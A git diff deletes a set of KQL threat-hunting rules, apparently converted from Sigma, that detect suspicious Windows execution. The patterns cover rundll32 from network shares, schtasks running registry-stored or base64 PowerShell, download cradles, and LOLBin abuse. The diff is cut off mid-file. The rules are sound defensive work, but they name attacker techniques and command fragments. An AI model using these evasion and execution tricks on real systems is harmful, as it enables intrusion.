-| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (not((InitiatingProcessCommandLine endswith "\\system32\\PcaSvc.dll,PcaPatchSdbTask" or DeviceName endswith ".internal.cloudapp.net" or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.0.0.0/8") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/16") or ipv4_is_in_range(RemoteIP, "51.105.0.0/16")) or (RemotePort == 443 and InitiatingProcessParentFileName =~ "svchost.exe"))))
\ No newline at end of file
diff --git a/Execution/Rundll32_UNC_Path_Execution.kql b/Execution/Rundll32_UNC_Path_Execution.kql
deleted file mode 100644
index 17761d13..00000000
--- a/Execution/Rundll32_UNC_Path_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/10
-// Level: high
-// Description: Detects rundll32 execution where the DLL is located on a remote location (share)
-// Tags: attack.defense_evasion, attack.execution, attack.t1021.002, attack.t1218.011
-DeviceProcessEvents
-| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/Execution/SQL_Client_Tools_PowerShell_Session_Detection.kql b/Execution/SQL_Client_Tools_PowerShell_Session_Detection.kql
deleted file mode 100644
index 8cf3471a..00000000
--- a/Execution/SQL_Client_Tools_PowerShell_Session_Detection.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Agro (@agro_sev) oscd.communitly
-// Date: 2020/10/13
-// Level: medium
-// Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
-Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
-
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (FolderPath endswith "\\sqltoolsps.exe" or InitiatingProcessFolderPath endswith "\\sqltoolsps.exe" or ProcessVersionInfoOriginalFileName =~ "\\sqltoolsps.exe") and (not(InitiatingProcessFolderPath endswith "\\smss.exe"))
\ No newline at end of file
diff --git a/Execution/Scheduled_Task_Creation_Via_Schtasks.EXE.kql b/Execution/Scheduled_Task_Creation_Via_Schtasks.EXE.kql
deleted file mode 100644
index 0ea2e752..00000000
--- a/Execution/Scheduled_Task_Creation_Via_Schtasks.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/01/16
-// Level: low
-// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI")))
\ No newline at end of file
diff --git a/Execution/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql b/Execution/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql
deleted file mode 100644
index 3d746a96..00000000
--- a/Execution/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/02/12
-// Level: high
-// Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand") and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/Execution/Scheduled_Task_Executing_Payload_from_Registry.kql b/Execution/Scheduled_Task_Executing_Payload_from_Registry.kql
deleted file mode 100644
index 0e49c7fb..00000000
--- a/Execution/Scheduled_Task_Executing_Payload_from_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/18
-// Level: medium
-// Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand")))
\ No newline at end of file
diff --git a/Execution/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql b/Execution/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql
deleted file mode 100644
index c68909e4..00000000
--- a/Execution/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/28
-// Level: high
-// Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
-// Tags: attack.execution, attack.persistence, attack.t1053.005
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " /change " or ProcessCommandLine contains " /create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "/ru " and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ")) and (not(((ProcessCommandLine contains "/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR " or ProcessCommandLine contains ":\\Program Files (x86)\\Avira\\System Speedup\\setup\\avira_speedup_setup.exe" or ProcessCommandLine contains "/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST") or ((ProcessCommandLine contains "/TN TVInstallRestore" and ProcessCommandLine contains "\\TeamViewer_.exe") and FolderPath endswith "\\schtasks.exe"))))
\ No newline at end of file
diff --git a/Execution/Schtasks_From_Suspicious_Folders.kql b/Execution/Schtasks_From_Suspicious_Folders.kql
deleted file mode 100644
index 7ef23c76..00000000
--- a/Execution/Schtasks_From_Suspicious_Folders.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/15
-// Level: high
-// Description: Detects scheduled task creations that have suspicious action command and folder combinations
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "%ProgramData%") and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ") and ProcessCommandLine contains " /create " and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/Execution/Script_Event_Consumer_Spawning_Process.kql b/Execution/Script_Event_Consumer_Spawning_Process.kql
deleted file mode 100644
index f27035e7..00000000
--- a/Execution/Script_Event_Consumer_Spawning_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sittikorn S
-// Date: 2021/06/21
-// Level: high
-// Description: Detects a suspicious child process of Script Event Consumer (scrcons.exe).
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msbuild.exe") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/Execution/Script_Interpreter_Execution_From_Suspicious_Folder.kql b/Execution/Script_Interpreter_Execution_From_Suspicious_Folder.kql
deleted file mode 100644
index ce37fdfb..00000000
--- a/Execution/Script_Interpreter_Execution_From_Suspicious_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/02/08
-// Level: high
-// Description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -ep bypass " or ProcessCommandLine contains " -ExecutionPolicy bypass " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains "/e:javascript " or ProcessCommandLine contains "/e:Jscript " or ProcessCommandLine contains "/e:vbscript ") or (FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "mshta.exe", "wscript.exe"))) and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/Execution/Service_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Service_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 28498146..00000000
--- a/Execution/Service_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/14
-// Level: medium
-// Description: An adversary might use WMI to check if a certain remote service is running on a remote device.
-When the test completes, a service information will be displayed on the screen if it exists.
-A common feedback message is that "No instance(s) Available" if the service queried is not running.
-A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
-
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where ProcessCommandLine contains "service" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Service_StartupType_Change_Via_PowerShell_Set-Service.kql b/Execution/Service_StartupType_Change_Via_PowerShell_Set-Service.kql
deleted file mode 100644
index c22f6141..00000000
--- a/Execution/Service_StartupType_Change_Via_PowerShell_Set-Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/04
-// Level: medium
-// Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
-// Tags: attack.execution, attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "Disabled" or ProcessCommandLine contains "Manual") and (ProcessCommandLine contains "Set-Service" and ProcessCommandLine contains "-StartupType")) and (FolderPath endswith "\\powershell.exe" or ProcessVersionInfoOriginalFileName =~ "PowerShell.EXE")
\ No newline at end of file
diff --git a/Execution/Service_StartupType_Change_Via_Sc.EXE.kql b/Execution/Service_StartupType_Change_Via_Sc.EXE.kql
deleted file mode 100644
index dc89c692..00000000
--- a/Execution/Service_StartupType_Change_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/01
-// Level: medium
-// Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
-// Tags: attack.execution, attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "disabled" or ProcessCommandLine contains "demand") and (ProcessCommandLine contains " config " and ProcessCommandLine contains "start")) and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Execution/Shell32_DLL_Execution_in_Suspicious_Directory.kql b/Execution/Shell32_DLL_Execution_in_Suspicious_Directory.kql
deleted file mode 100644
index 572e8c51..00000000
--- a/Execution/Shell32_DLL_Execution_in_Suspicious_Directory.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/11/24
-// Level: high
-// Description: Detects shell32.dll executing a DLL in a suspicious directory
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.011
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%LocalAppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\") and (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Execution/Start_Windows_Service_Via_Net.EXE.kql b/Execution/Start_Windows_Service_Via_Net.EXE.kql
deleted file mode 100644
index 2357f3be..00000000
--- a/Execution/Start_Windows_Service_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/21
-// Level: low
-// Description: Detects the usage of the "net.exe" command to start a service using the "start" flag
-// Tags: attack.execution, attack.t1569.002
-DeviceProcessEvents
-| where ProcessCommandLine contains " start " and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Binary_In_User_Directory_Spawned_From_Office_Application.kql b/Execution/Suspicious_Binary_In_User_Directory_Spawned_From_Office_Application.kql
deleted file mode 100644
index 03b12aec..00000000
--- a/Execution/Suspicious_Binary_In_User_Directory_Spawned_From_Office_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jason Lynch
-// Date: 2019/04/02
-// Level: high
-// Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
-// Tags: attack.execution, attack.t1204.002, attack.g0046, car.2013-05-002
-DeviceProcessEvents
-| where (FolderPath endswith ".exe" and FolderPath startswith "C:\\users\\" and (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.exe" or InitiatingProcessFolderPath endswith "\\EQNEDT32.exe")) and (not(FolderPath endswith "\\Teams.exe"))
\ No newline at end of file
diff --git a/Execution/Suspicious_Child_Process_Of_BgInfo.EXE.kql b/Execution/Suspicious_Child_Process_Of_BgInfo.EXE.kql
deleted file mode 100644
index d6006a54..00000000
--- a/Execution/Suspicious_Child_Process_Of_BgInfo.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/16
-// Level: high
-// Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
-// Tags: attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\PerfLogs\\")) and (InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe")
\ No newline at end of file
diff --git a/Execution/Suspicious_Command_Patterns_In_Scheduled_Task_Creation.kql b/Execution/Suspicious_Command_Patterns_In_Scheduled_Task_Creation.kql
deleted file mode 100644
index e2eb0ec4..00000000
--- a/Execution/Suspicious_Command_Patterns_In_Scheduled_Task_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/23
-// Level: high
-// Description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (((ProcessCommandLine contains "/sc minute " or ProcessCommandLine contains "/ru system ") and (ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ")) or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains " bypass " or ProcessCommandLine contains " IEX" or ProcessCommandLine contains ".DownloadData" or ProcessCommandLine contains ".DownloadFile" or ProcessCommandLine contains ".DownloadString" or ProcessCommandLine contains "/c start /min " or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "mshta http" or ProcessCommandLine contains "mshta.exe http") or ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Tmp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%") and (ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wscript")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Csi.exe_Usage.kql b/Execution/Suspicious_Csi.exe_Usage.kql
deleted file mode 100644
index ea5c49ee..00000000
--- a/Execution/Suspicious_Csi.exe_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Konstantin Grishchenko, oscd.community
-// Date: 2020/10/17
-// Level: medium
-// Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'
-// Tags: attack.execution, attack.t1072, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessVersionInfoCompanyName =~ "Microsoft Corporation" and ((FolderPath endswith "\\csi.exe" or FolderPath endswith "\\rcsi.exe") or (ProcessVersionInfoOriginalFileName in~ ("csi.exe", "rcsi.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Electron_Application_Child_Processes.kql b/Execution/Suspicious_Electron_Application_Child_Processes.kql
deleted file mode 100644
index 81ee345f..00000000
--- a/Execution/Suspicious_Electron_Application_Child_Processes.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/21
-// Level: medium
-// Description: Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
-
-// Tags: attack.execution
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\discord.exe" or InitiatingProcessFolderPath endswith "\\GitHubDesktop.exe" or InitiatingProcessFolderPath endswith "\\keybase.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\slack.exe" or InitiatingProcessFolderPath endswith "\\Teams.exe") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\")) and (not(((FolderPath endswith "\\chrome.exe" and InitiatingProcessFolderPath endswith "\\chrome.exe") or (FolderPath endswith "\\discord.exe" and InitiatingProcessFolderPath endswith "\\discord.exe") or (FolderPath endswith "\\GitHubDesktop.exe" and InitiatingProcessFolderPath endswith "\\GitHubDesktop.exe") or (FolderPath endswith "\\keybase.exe" and InitiatingProcessFolderPath endswith "\\keybase.exe") or (FolderPath endswith "\\msedge.exe" and InitiatingProcessFolderPath endswith "\\msedge.exe") or (FolderPath endswith "\\msedgewebview2.exe" and InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") or (FolderPath endswith "\\msteams.exe" and InitiatingProcessFolderPath endswith "\\msteams.exe") or (FolderPath endswith "\\slack.exe" and InitiatingProcessFolderPath endswith "\\slack.exe") or (FolderPath endswith "\\teams.exe" and InitiatingProcessFolderPath endswith "\\teams.exe") or (FolderPath in~ ("C:\\Windows\\SysWOW64\\WerFault.exe", "C:\\Windows\\System32\\WerFault.exe"))))) and (not((ProcessCommandLine contains "\\NVSMI\\nvidia-smi.exe" and InitiatingProcessFolderPath endswith "\\Discord.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql b/Execution/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql
deleted file mode 100644
index c8bc79a5..00000000
--- a/Execution/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/03/01
-// Level: high
-// Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
-// Tags: attack.execution, attack.defense_evasion, attack.t1059.001, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains "OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvACIAKwAiAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvAGEAIgArACIAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvACcAKwAnAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvAGEAJwArACcAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA"
\ No newline at end of file
diff --git a/Execution/Suspicious_Encoded_PowerShell_Command_Line.kql b/Execution/Suspicious_Encoded_PowerShell_Command_Line.kql
deleted file mode 100644
index 28b221a3..00000000
--- a/Execution/Suspicious_Encoded_PowerShell_Command_Line.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
-// Date: 2018/09/03
-// Level: high
-// Description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aQBlAHgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAA" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " UwB" or ProcessCommandLine contains " cwB") and ProcessCommandLine contains " -e") or (ProcessCommandLine contains ".exe -ENCOD " or ProcessCommandLine contains " BA^J e-")) and (not(ProcessCommandLine contains " -ExecutionPolicy remotesigned "))
\ No newline at end of file
diff --git a/Execution/Suspicious_Execution_Location_Of_Wermgr.EXE.kql b/Execution/Suspicious_Execution_Location_Of_Wermgr.EXE.kql
deleted file mode 100644
index dcbabf9d..00000000
--- a/Execution/Suspicious_Execution_Location_Of_Wermgr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/10/14
-// Level: high
-// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.
-// Tags: attack.execution
-DeviceProcessEvents
-| where FolderPath endswith "\\wermgr.exe" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Execution_of_Powershell_with_Base64.kql b/Execution/Suspicious_Execution_of_Powershell_with_Base64.kql
deleted file mode 100644
index 5ee1184e..00000000
--- a/Execution/Suspicious_Execution_of_Powershell_with_Base64.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/02
-// Level: medium
-// Description: Commandline to launch powershell with a base64 payload
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco" or ProcessCommandLine contains " -ec ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (not(((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe") or ProcessCommandLine contains " -Encoding ")))
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Characteristics_Due_to_Missing_Fields.kql b/Execution/Suspicious_File_Characteristics_Due_to_Missing_Fields.kql
deleted file mode 100644
index c1cea9e1..00000000
--- a/Execution/Suspicious_File_Characteristics_Due_to_Missing_Fields.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Sander Wiebing
-// Date: 2018/11/22
-// Level: medium
-// Description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
-// Tags: attack.execution, attack.t1059.006
-DeviceProcessEvents
-| where ((ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductVersion =~ "?") or (ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductName =~ "?") or (ProcessVersionInfoCompanyName =~ "?" and ProcessVersionInfoFileDescription =~ "?")) and FolderPath contains "\\Downloads\\"
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Created_In_PerfLogs.kql b/Execution/Suspicious_File_Created_In_PerfLogs.kql
deleted file mode 100644
index 45c8e0fb..00000000
--- a/Execution/Suspicious_File_Created_In_PerfLogs.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: medium
